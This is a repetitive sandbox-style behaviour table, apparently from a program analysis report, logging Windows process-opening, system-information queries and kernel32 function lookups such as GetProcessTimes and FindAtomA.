| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
